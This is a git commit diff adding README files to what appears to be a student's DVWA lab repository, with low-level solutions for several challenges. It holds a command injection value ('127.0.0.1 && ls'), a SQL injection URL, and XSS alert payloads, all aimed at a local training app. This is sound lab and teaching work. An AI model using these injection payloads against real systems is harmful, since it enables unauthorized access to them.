feat: 🚚 Create readme for each categories and clean repo
This commit is contained in:
11
CSP Bypass/README.md
Normal file
11
CSP Bypass/README.md
Normal file
@ -0,0 +1,11 @@
|
||||
# Low
|
||||
```javascript
|
||||
console.log("Welcome the the hacking word");
|
||||
```
|
||||
> Upload this script to pastebin
|
||||
|
||||
# Medium
|
||||
> In progress
|
||||
|
||||
# High
|
||||
> In progress
|
@ -1,2 +0,0 @@
|
||||
console.log("Welcome the the hacking word");
|
||||
// Export this script to pastebin
|
10
Command Injection/README.md
Normal file
10
Command Injection/README.md
Normal file
@ -0,0 +1,10 @@
|
||||
# Low
|
||||
```bash
|
||||
127.0.0.1 && ls
|
||||
```
|
||||
|
||||
# Medium
|
||||
> In progress
|
||||
|
||||
# High
|
||||
> In progress
|
8
File injection/README.md
Normal file
8
File injection/README.md
Normal file
@ -0,0 +1,8 @@
|
||||
# Low
|
||||
Just upload the file `file-inject-low.png` and you will get the flag.
|
||||
|
||||
# Medium
|
||||
> In progress
|
||||
|
||||
# High
|
||||
> In progress
|
@ -1,3 +1,12 @@
|
||||
# Low
|
||||
```javascript
|
||||
const phrase = document.getElementById("phrase").value;
|
||||
const token = md5(rot13(phrase));
|
||||
console.log(token);
|
||||
```
|
||||
|
||||
# Medium
|
||||
> In progress
|
||||
|
||||
# High
|
||||
> In progress
|
9
README.md
Normal file
9
README.md
Normal file
@ -0,0 +1,9 @@
|
||||
# EPITA-DVWA
|
||||
|
||||
My journey through application vulnerability using Damn Vulnerable Web Application (DVWA).
|
||||
|
||||
## What is DVWA?
|
||||
DVWA is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
|
||||
|
||||
## How this repository is organized?
|
||||
This repository is organized by the different vulnerabilities that I have found in DVWA. Each vulnerability has its own folder and contains a README.md file that explains the vulnerability and how to exploit it.
|
7
SQL Injection/README.md
Normal file
7
SQL Injection/README.md
Normal file
@ -0,0 +1,7 @@
|
||||
# Low
|
||||
Full url : http://localhost:4280/vulnerabilities/sqli/?id=test%27+OR+1=1--%27&Submit=Submit#
|
||||
|
||||
# Medium
|
||||
> In progress
|
||||
# High
|
||||
> In progress
|
@ -1 +0,0 @@
|
||||
Full url : http://localhost:4280/vulnerabilities/sqli/?id=test%27+OR+1=1--%27&Submit=Submit#
|
8
XSS (DOM)/README.md
Normal file
8
XSS (DOM)/README.md
Normal file
@ -0,0 +1,8 @@
|
||||
# Low
|
||||
Full URL : [http://localhost:4280/vulnerabilities/xss_d/?default=French<script>alert("Hello hacker")</script>]()
|
||||
|
||||
# Medium
|
||||
> In progress
|
||||
|
||||
# High
|
||||
> In progress
|
@ -1 +0,0 @@
|
||||
http://localhost:4280/vulnerabilities/xss_d/?default=French<script>alert("Hello hacker")</script>
|
9
XSS (Stored)/README.md
Normal file
9
XSS (Stored)/README.md
Normal file
@ -0,0 +1,9 @@
|
||||
# Low
|
||||
```javascript
|
||||
<script>alert("XSS");</script>
|
||||
````
|
||||
# Medium
|
||||
> In progress
|
||||
|
||||
# High
|
||||
> In progress
|
Reference in New Issue
Block a user